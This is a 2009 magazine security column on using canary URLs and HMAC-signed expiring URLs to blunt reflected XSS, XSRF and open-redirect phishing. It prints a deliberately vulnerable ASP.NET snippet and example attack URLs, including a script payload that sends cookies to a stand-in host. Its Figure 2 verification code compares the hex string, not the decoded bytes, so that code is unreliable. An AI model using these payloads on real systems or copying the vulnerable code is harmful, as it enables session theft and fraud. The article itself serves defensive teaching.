March 2009

Volume 24 Number 03

Security Briefs - Protect Your Site With URL Rewriting

By Bryan Sullivan | March 2009

Contents

Reviewing the Problem
A Possible Solution: Personalized Resource Locators
A Better Solution: Canary URLs
A Stateless Approach: Automatically Expiring URLs
Final Step
Some Caveats

Tim Berners-Lee once famously wrote that "cool URIs don't change." His opinion was that broken hyperlinks erode user confidence in an application and that URIs should be designed in such a way that they can remain unchanged for 200 years or more. While I understand his point, I'll venture to guess that when he made that statement he hadn't foreseen the ways in which hyperlinks would become a means for hackers to attack innocent users.

Attacks like cross-site scripting (XSS), cross-site request forgery (XSRF), and open-redirect phishing are routinely propagated through malicious hyperlinks sent in e-mail messages. (If you're unfamiliar with these attacks, I recommend reading about them at the Open Web Application Security Project (OWASP) Web.) We could mitigate much of the risk of these vulnerabilities by frequently changing our URLs—not once every 200 years but once every 10 minutes. Attackers would no longer be able to exploit application vulnerabilities by mass e-mailing poisoned hyperlinks because the links would be broken and invalid by the time the messages reached their intended victims. With all due respect to Sir Tim, while "cool" URIs may not change, secure ones certainly do.

Reviewing the Problem

Before we get into the details of a solution, let's take a closer look at the problem. Here's a very simple example of some ASP.NET code vulnerable to an XSS attack:

protected void Page_Load(object sender, EventArgs e) { // DO NOT USE - this is vulnerable code Response.Write("Welcome back, " + Request["username"]); }

The code is vulnerable because the page is writing the username parameter from the request back into the response without any validation or encoding. An attacker could easily exploit this vulnerability by crafting a URL with script injected into the username parameter, such as:

page.aspx?username=<script>document.location= 'https://contoso.com/'+document.cookie;</script>

Now the attacker just needs to convince a victim to click on the link. Mass e-mails are an effective way to accomplish this, especially when a little social engineering is applied (for example, "Click here to receive your free Xbox 360!"). Similar malicious URLs can be constructed and e-mailed to exploit XSRF vulnerabilities:

checking.aspx?action=withdraw&amount=1000&destination=badguy and open-redirect vulnerabilities: page.aspx?redirect=https://evil.contoso.com

Open-redirect vulnerabilities are less well known than XSS and XSRF. They occur when an application allows a user to specify an arbitrary redirect URL in the request. This can lead to a phishing attack in which the user believes she is clicking a link that will take her to good.adatum.com, but in reality she will be redirected to evil.contoso.com.

A Possible Solution: Personalized Resource Locators

One possible solution to this problem is for an application to rewrite its URLs so that they are personalized for each user (or better yet, each user session). For example, an application could rewrite the URL contoso.com/page.aspx as contoso.com/{GUID}/page.aspx, where {GUID} is random and unique for each user session. Given that there are 2 128 possible GUID values, it is fantastically unlikely that an attacker would be able to guess a valid one, so presumably he would not be able to craft and e-mail a valid (and poisoned) URL.

ASP.NET already has similar functionality built in as part of its cookieless session-handling capability. Because some users can't or won't accept HTTP cookies, ASP.NET can be configured to store the user's session ID in the URL instead. You can enable this with a simple change to your web.config file:

<sessionState cookieless="true" />

On further inspection, however, we see that this approach does not really mitigate any of the security vulnerabilities that we're concerned about, like XSS. The attacker may not be able to guess a valid session GUID, but he doesn't actually have to. He can start his own session, get a valid session ID, and then lure a victim into using that session by e-mailing the URL.

Even though another user is using that session, the attacker is not prevented from using it simultaneously and stealing the victim's private data. The application has no accurate way to determine that two different people are using the same session—certainly it could check the incoming IP address, but there are many scenarios in which a single user's IP address changes legitimately from request to request or multiple users share the same IP address. This attack is called a session fixation attack and is one of the reasons why using cookieless session management is generally not recommended.

A Better Solution: Canary URLs

We can greatly improve the effectiveness of the personalized-URL approach by making one small change. Instead of using the URL to store the session ID, we store the session ID in a cookie as usual and use the URL to store a secret shared between the client and the server. We modify the URL rewriting code to store a per-session, unique, and random value both in session state and as part of the URL:

// create the shared secret Guid secret = Guid.NewGuid(); Session["secret"] = secret; // rewrite the URL to include the secret value ...

(The code required to actually rewrite the URL and parse incoming values is beyond the scope of this article. ASP.NET MVC can be used for this purpose, and Scott Guthrie has also blogged about ASP.NET URL rewriting techniques.)

On any request, we compare the value of the GUID stored in the URL to the one stored in session state. If they don't match, or if the GUID is missing from the URL, the request is considered malicious, it is blocked, and the originating IP address is logged. This shared-secret defense (also referred to as a canary defense) has long been the recommended approach to preventing XSRF attacks, but as you can see, it does a pretty good job of mitigating reflected XSS vulnerabilities as well by cutting off the e-mail propagation vector.

It's important to note that this is not a complete solution against XSS. The best way to prevent XSS is to address the source of the problem by validating input and encoding output, but canaries can be applied as an additional layer of defense.

A Stateless Approach: Automatically Expiring URLs

While the canary URL approach is a good, secure methodology, it does have one weakness: it relies on server-side session state. If you have a stateless application, such as a Web service or a REST application, you probably won't want to enable session state only for the purpose of storing canary values.

In cases like these, you can accomplish your overall goal (preventing attackers from e-mailing malicious hyperlinks) without needing to maintain server-side session state by implementing automatically expiring URLs. A URL that expires a short period of time after it's requested (10 minutes or so) would greatly reduce the window of opportunity for an attacker to e-mail that URL to potential victims but still allow legitimate users sufficient time to work with the resource.

One way to put an expiration date on a URL is to rewrite the URL to include the current time stamp, like this:

https://www.contoso.com/{timestamp}/page.aspx

Whenever a user makes a request for the resource, the incoming time stamp in the URL is checked to see whether it's more than 10 minutes old (or whatever the specified time threshold is). If so, the request is denied. An alternative is to write the desired expiration time into the URL and then check that against the current time. However, both of these approaches as presented are flawed because an attacker could very easily forge a URL that would be valid at some point in the future:

https://www.contoso.com/{current timestamp + one hour}/page.aspx

This problem becomes even worse if you're using the URL to hold the expiration time stamp instead of the initial request time stamp because now the attacker can specify an arbitrarily distant point in the future and completely negate the defense:

https://www.contoso.com/{current timestamp + ten years}/page.aspx

The solution to this problem is to prevent attackers from tampering with the time stamp by also including a keyed hash of the time stamp in the URL as kind of a keyed-hash message authentication code (HMAC). The fact that you key the hash is critical: without this, an attacker could again specify a future time stamp, compute a hash value for it, and negate your defense. When you key the hash with a secret key, this is no longer possible.

While MD5 is a popular hash algorithm, it is no longer considered secure, as cryptography researchers have demonstrated ways to cause collisions and therefore break the algorithm. A better choice is one of the SHA-2 (Secure Hash Algorithm) functions such as SHA-256, which has not been successfully attacked as of this writing. SHA-256 is implemented by the Microsoft .NET Framework classes System.Security.Cryptography.SHA256Cng, SHA256Crypto­ServiceProvider, SHA256Managed, and HMACSHA256.

Any of these will work, but since the HMACSHA256 class has built-in functionality to apply a secret key value, it is the best choice:

HMACSHA256 hmac = new HMACSHA256(); // use a random key value

Using the default HMACSHA256 constructor applies a random key value to the hash, which should be sufficient for security, but this won't work in a server farm environment because each HMACSHA256 object will have a different key. If you are deploying your application in a farm, you need to explicitly specify the key in the constructor and make sure it's the same for all servers in the farm.

The next step is to write the time stamp along with the keyed hash into the URL. As an implementation detail, note that the output of the HMACSHA256.ComputeHash method is a byte array, but you will need to convert this to a URL-legal string because you will be writing it into the outgoing URL. This conversion is a little trickier than it sounds. Base64 is commonly used to convert arbitrary binary data into string text, but base64 contains characters like the equals sign (=) and the slash (/) that will cause parsing problems for ASP.NET even if they are URL encoded. Instead, you should convert binary data 1 byte at a time to a hexadecimal string, as shown in Figure 1.

Figure 1 Generating the Keyed Time Stamp

private static string convertToHex(byte[] data) { System.Text.StringBuilder sb = new System.Text.StringBuilder(data.Length); foreach (byte b in data) sb.AppendFormat("{0:X2}", (int)b); return sb.ToString(); } private string generateKeyedTimestamp() { long outgoingTicks = DateTime.Now.Ticks; // get a SHA2 hash value of the timestamp byte[] timestampHash = this.hmac.ComputeHash(System.BitConverter.GetBytes(outgoingTicks)); // return the current timestamp with the keyed hash value return outgoingTicks.ToString() + "-" + convertToHex(timestampHash); }

Finally, you must verify the incoming time stamp by recomputing its hash and making sure that it matches the incoming hash. The code is shown in Figure 2.

Figure 2 Verifying the Incoming Time Stamp

private static byte[] convertFromHex(string data) { // we know that the hex string must have an even number of digits if ((data.Length % 2) != 0) throw new ArgumentException(); byte[] dataHex = new byte[data.Length / 2]; for (int i = 0; i < data.Length; i = i + 2) { string hexByte = data.Substring(i, 2); dataHex[i / 2] = (byte)Convert.ToByte(hexByte, 16); } return dataHex; } private bool verifyKeyedTimestamp(long incomingTicks, string incomingHmac) { if (String.IsNullOrEmpty(incomingHmac)) return false; byte[] incomingHmacBytes = convertFromHex(incomingHmac); // recompute the hash and verify that it matches the passed-in value byte[] recomputedHmac = this.hmac.ComputeHash(BitConverter.GetBytes(incomingTicks)); // perform byte-by-byte comparison on the arrays if (incomingHmac.Length != recomputedHmac.Length) return false; for (int i = 0; i < incomingHmac.Length; i++) { if (incomingHmac[i] != recomputedHmac[i]) return false; } return true; }

Final Step

As a final step, whether you are using the canary approach or the automatic expiration approach, you need to designate one or more pages in your application as "landing pages" that can be accessed without the special URL token. Without this, no one will be able to use your application because there would be no way to make an initial valid request.

There are many ways in which you can designate landing pages, from hardcoding them in the rewriting module code (definitely not recommended) to specifying them in a web.config file (better), but my preferred approach is to use a custom attribute. Using a custom attribute reduces the amount of code you need to write and also allows for inheritance: you can define a LandingPage class and apply the custom attribute to that class, and then any page that derives from LandingPage will also be a landing page.

Start by defining a new custom attribute class called LandingPageAttribute. This class doesn't actually have to contain any methods or properties. You just need to be able to mark pages with this attribute and be able to programmatically determine whether a page is so marked:

public class LandingPageAttribute : Attribute { }

Now mark any page you want to use as a landing page with the LandingPage attribute, like this:

[LandingPage()] public partial class HomePage : System.Web.UI.Page

Finally, in your URL verification code, check whether the requested handler has the custom attribute. If you're implementing your URL rewrite code as an HttpModule, you can use the code in Figure 3to perform the check.

Figure 3 Checking for the Custom LandingPageAttribute

public class RewriteModule : IHttpModule { public void Init(HttpApplication context) { context.PostMapRequestHandler += new EventHandler(context_PostMapRequestHandler); } void context_PostMapRequestHandler(object sender, EventArgs e) { HttpApplication application = sender as HttpApplication; if ((application == null) || (application.Context == null)) return; // get the current request handler IHttpHandler httpHandler = application.Context.CurrentHandler; if (httpHandler == null) return; // reflect into the handler type to look for a LandingPageAttribute Type handlerType = httpHandler.GetType(); object[] landingPageAttributes = handlerType.GetCustomAttributes(typeof(LandingPageAttribute), true); // allow access if we found any bool allowAccess = (landingPageAttributes.Length > 0); ... } }

Use the LandingPage attribute with caution. Not only are the rewriting defenses invalid for landing pages (because an attacker could simply remove the URL token), but one XSS vulnerability on a single landing page could jeopardize every page on the domain. An attacker could inject a series of XMLHttpRequest calls into the client-side script to programmatically determine a valid canary or time stamp and redirect his attack accordingly.

If possible, determine a single landing page for your application, and have that page immediately redirect to a URL-rewritten page after stripping out all querystring parameters. For example,

https://www.contoso.com/landingpage.aspx?a=b&c=d

would automatically redirect to

https://www.contoso.com/(token)/otherpage.aspx

Some Caveats

Of course, URL rewriting may not be appropriate for all applications. One negative side effect of this approach is that although attackers are no longer able to e-mail malicious hyperlinks, legitimate users are similarly prevented from sending valid links or even from bookmarking pages in the application. Any page marked as a landing page could be bookmarked, but as I mentioned before, you need to be very cautious when using landing pages. Therefore, if you expect users of your application to bookmark pages other than the home page, URL rewriting is probably not a good solution for you.

Additionally, while URL rewriting is a fast and easy defense-in-depth mechanism, it is just that: defense-in-depth. It is by no means a silver bullet against XSS or any other attacks. An automatically expiring URL can still be exploited by an attacker with access to a Web server of his own. Instead of sending out malicious hyperlinks that point directly to the vulnerable page, he can send out hyperlinks that point to his own site. When his site gets a hit from one of the phished e-mails, it can contact a landing page on the vulnerable site to obtain a valid time stamp and then redirect the user accordingly.

URL rewriting does make the attacker's work more difficult: he now has to convince a user to follow a hyperlink to his Web site (evil.contoso.com) rather than a trusted one (www.msn.com), and he is also leaving a very clear trail back to himself for law enforcement agencies to follow. However, this will probably be of little comfort to any victims who fall for the phished e-mail and have their identities stolen as a result. Do use URL rewriting as an extra defensive measure, but always be sure to address vulnerabilities at the root of the problem.

Finally, I'd like to note that the techniques I've described in this article should not be construed as authoritative Microsoft development guidance. Please feel free to use them, but don't take them as Secure Development Lifecycle (SDL) requirements. We are currently conducting ongoing research in this area, and we would love to get your feedback. Please feel free to contact me at the SDL blog ( blogs.msdn.com/sdl) with any comments.

Send your questions and comments to briefs@microsoft.com.

Bryan Sullivan is a Security Program Manager for the Microsoft Security Development Lifecycle team, where he specializes in Web application security issues. His first book, Ajax Security, was published by Addison-Wesley in December 2007.